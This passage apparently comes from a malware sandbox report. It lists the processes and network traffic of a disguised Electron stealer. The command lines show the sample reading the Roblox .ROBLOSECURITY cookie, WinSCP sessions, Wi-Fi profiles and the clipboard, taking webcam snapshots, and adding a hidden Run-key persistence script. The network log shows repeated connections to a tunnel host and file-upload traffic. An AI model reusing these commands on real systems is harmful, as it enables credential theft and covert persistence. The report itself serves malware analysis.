C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Process_Hacker2_is1""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Process_Hacker2_is1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\N4gPZPQPQG7R_temp.ps1""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& { function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace \"root\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { \"262144\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"262160\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"266240\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"266256\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"393216\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"393232\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"393488\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"397312\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"397328\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"397584\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } default { $defstatus = \"Unknown\"; $rtstatus = \"Unknown\" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& {powershell Get-Clipboard}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\33sN7DhO25fCsoJ0peG9\System\cam.5164_Admin.jpg"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& {netsh wlan show profile}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\N4gPZPQPQG7R_temp.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Clipboard

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" wlan show profile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\33sN7DhO25fCsoJ0peG9\System\cam.5164_Admin"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_WSlAND /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WSlAND.vbs /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WSlAND.vbs\"""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_WSlAND /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WSlAND.vbs /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WSlAND.vbs\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_WSlAND.vbs

C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe

"C:\Users\Admin\AppData\Local\Temp\2ZdJrlsXFZA6Mvwb1zRT6tZ0IC4\Creative EAX Settings.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAIAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1480 --field-trial-handle=1772,5064392763959393394,8550773419608691522,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 6.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 2.181.190.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 16.ip.gl.ply.gg udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
N/A 127.0.0.1:53059 tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 content-signature-2.cdn.mozilla.net udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 34.117.237.239:443 contile.services.mozilla.com tcp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 contile.services.mozilla.com udp
US 8.8.8.8:53 shavar.services.mozilla.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 44.236.180.36:443 shavar.services.mozilla.com tcp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 push.services.mozilla.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 firefox.settings.services.mozilla.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.107.243.93:443 autopush.prod.mozaws.net tcp
N/A 127.0.0.1:53065 tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 aus5.mozilla.org udp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 34.149.100.209:443 prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.160.144.191:443 prod.content-signature-chains.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 ciscobinary.openh264.org udp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.180.14:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 155.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 r1---sn-4g5e6nzl.gvt1.com udp
US 8.8.8.8:53 r1.sn-4g5e6nzl.gvt1.com udp
US 8.8.8.8:53 r1.sn-4g5e6nzl.gvt1.com udp
GB 142.250.180.14:443 redirector.gvt1.com udp
DE 74.125.11.102:443 r1.sn-4g5e6nzl.gvt1.com tcp
US 8.8.8.8:53 14.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 102.11.125.74.in-addr.arpa udp
DE 74.125.11.102:443 r1.sn-4g5e6nzl.gvt1.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 34.117.121.53:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 4.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 consent.google.com udp
US 8.8.8.8:53 consent.google.com udp
US 8.8.8.8:53 consent.google.com udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.179.238:443 apis.google.com tcp
US 8.8.8.8:53 plus.l.google.com udp
US 8.8.8.8:53 plus.l.google.com udp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
GB 172.217.16.238:443 encrypted-tbn0.gstatic.com tcp
GB 172.217.16.238:443 encrypted-tbn0.gstatic.com tcp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
GB 172.217.16.238:443 encrypted-tbn0.gstatic.com tcp
GB 172.217.16.238:443 encrypted-tbn0.gstatic.com tcp
GB 142.250.179.238:443 plus.l.google.com udp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
GB 172.217.16.238:443 encrypted-tbn0.gstatic.com udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 yopmail.com udp
GB 87.98.250.141:443 yopmail.com tcp
US 8.8.8.8:53 yopmail.com udp
US 8.8.8.8:53 yopmail.com udp
GB 87.98.250.141:443 yopmail.com tcp
GB 87.98.250.141:443 yopmail.com tcp
GB 87.98.250.141:443 yopmail.com tcp
US 8.8.8.8:53 141.250.98.87.in-addr.arpa udp
US 8.8.8.8:53 234.187.250.142.in-addr.arpa udp
GB 87.98.250.141:443 yopmail.com tcp
GB 87.98.250.141:443 yopmail.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 142.250.178.2:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 34.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 2.178.250.142.in-addr.arpa udp
GB 142.250.178.2:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
GB 142.250.200.46:443 fundingchoicesmessages.google.com tcp
US 8.8.8.8:53 www3.l.google.com udp
US 8.8.8.8:53 www3.l.google.com udp
GB 142.250.200.46:443 www3.l.google.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
GB 216.58.212.193:443 lh3.googleusercontent.com tcp
US 8.8.8.8:53 googlehosted.l.googleusercontent.com udp
US 8.8.8.8:53 46.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 193.212.58.216.in-addr.arpa udp
GB 216.58.212.193:443 googlehosted.l.googleusercontent.com udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com tcp
US 8.8.8.8:53 tpc.googlesyndication.com udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com udp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com udp
US 8.8.8.8:53 1.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.googletagservices.com udp
GB 142.250.179.226:443 www.googletagservices.com tcp
US 8.8.8.8:53 www.googletagservices.com udp
GB 142.250.179.226:443 www.googletagservices.com tcp
US 8.8.8.8:53 www.googletagservices.com udp
GB 142.250.179.226:443 www.googletagservices.com udp
US 8.8.8.8:53 226.179.250.142.in-addr.arpa udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 yopmail.com udp
US 8.8.8.8:53 www.filemail.com udp
NL 178.21.23.181:443 www.filemail.com tcp
